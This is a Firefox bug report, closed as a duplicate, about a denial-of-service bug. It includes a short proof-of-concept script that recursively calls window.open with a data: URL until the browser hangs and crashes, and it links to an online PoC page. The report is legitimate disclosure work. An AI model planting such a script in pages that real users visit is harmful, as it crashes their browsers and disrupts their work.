Closed Bug 1339352 Opened 5 years ago Closed 5 years ago

Denial of Service using a link via.window.open()

Categories

(Firefox :: Untriaged, defect)

51 Branch
x86_64
macOS
defect
Not set
normal

Tracking

()

RESOLVED DUPLICATE of bug 685828

People

(Reporter: evilzyzeng, Unassigned)

Details

User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36

Steps to reproduce:

1.the poc script is:

<script>
function g(){
    window.open("https://cn.bing.com","z");
    window.open("data:text/html,<script>alert(document.domain)<\/script>","z");
    g();
    };

</script>
<a href="javascript:g()" style="font-size: 100px">click me</a>

or visit online poc page:

https://api.lightrains.org/poc/5.html

2.macOS version:10.12.3 firefox version:51.0.1



Actual results:

firefox doesn't work anymore,cpu occupancy rate rise rapidly,then firefox will crashed.


Expected results:

As normal as ever
OS: Unspecified → Mac OS X
Hardware: Unspecified → x86_64
Group: firefox-core-security
Status: UNCONFIRMED → RESOLVED
Closed: 5 years ago
Resolution: --- → DUPLICATE
Duplicate of bug: 685828
(In reply to :Gijs from comment #1)
> 
> *** This bug has been marked as a duplicate of bug 685828 ***

OK,Thank you for your work.
You need to log in before you can comment on or make changes to this bug.